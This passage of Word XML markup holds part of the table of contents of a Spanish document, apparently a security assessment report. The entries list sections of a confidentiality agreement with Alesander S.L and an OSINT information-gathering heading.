                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034132" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>8-</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Acuerdo de confidencialidad</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034132 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>14</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="3E66C7F7" w14:textId="5E4EC05B" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034133" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>ACUERDO DE CONFIDENCIALIDAD Y SECRETO</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034133 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>14</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="08121E4F" w14:textId="5D09738F" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034134" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.1</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Obligaciones Alesander S.L</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034134 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>14</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="3A216C6E" w14:textId="1D52CEE9" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034135" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.2</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Exclusiones</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034135 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>15</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="2F49867D" w14:textId="798A8046" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034136" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.3</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Derechos de propiedad</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034136 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>15</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="32B92AAD" w14:textId="3179A256" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034137" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.4</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Vigencia</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034137 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>16</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="04A6EA58" w14:textId="30FD44A5" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034138" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t xml:space="preserve">3.5 </w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Legislación aplicable</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034138 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>16</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="1278EDFD" w14:textId="0AD66855" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034139" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.6</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>CLÁUSULA PENAL</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034139 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>16</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="444EC958" w14:textId="770EE2E5" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034140" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.7</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>CONFIDENCIALIDAD DEL ACUERDO</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034140 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>17</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="1D8F04EB" w14:textId="7A5980E4" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034141" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.8</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>MODIFICACIÓN O CANCELACIÓN</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034141 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>17</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="12BC7DF2" w14:textId="410CED35" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC3"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="1100"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034142" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.8</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>JURISDICCIÓN.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034142 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>17</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="643866D5" w14:textId="2FBF9A9E" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC1"/>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
                </w:rPr>
              </w:pPr>
              <w:hyperlink w:anchor="_Toc128034143" w:history="1">
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>3.</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                    <w:noProof/>
                    <w:lang w:eastAsia="es-ES"/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4" w:rsidRPr="0011188E">
                  <w:rPr>
                    <w:rStyle w:val="Hipervnculo"/>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Recopilación de información (OSINT)</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:tab/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="begin"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:instrText xml:space="preserve"> PAGEREF _Toc128034143 \h </w:instrText>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="separate"/>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:t>18</w:t>
                </w:r>
                <w:r w:rsidR="00345EC4">
                  <w:rPr>
                    <w:noProof/>
                    <w:webHidden/>
                  </w:rPr>
                  <w:fldChar w:fldCharType="end"/>
                </w:r>
              </w:hyperlink>
            </w:p>
            <w:p w14:paraId="62CDE2E0" w14:textId="2EE6DE22" w:rsidR="00345EC4" w:rsidRDefault="00000000">
              <w:pPr>
                <w:pStyle w:val="TDC2"/>
                <w:tabs>
                  <w:tab w:val="left" w:pos="660"/>
                  <w:tab w:val="right" w:leader="dot" w:pos="8494"/>
                </w:tabs>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                  <w:noProof/>
                  <w:lang w:eastAsia="es-ES"/>
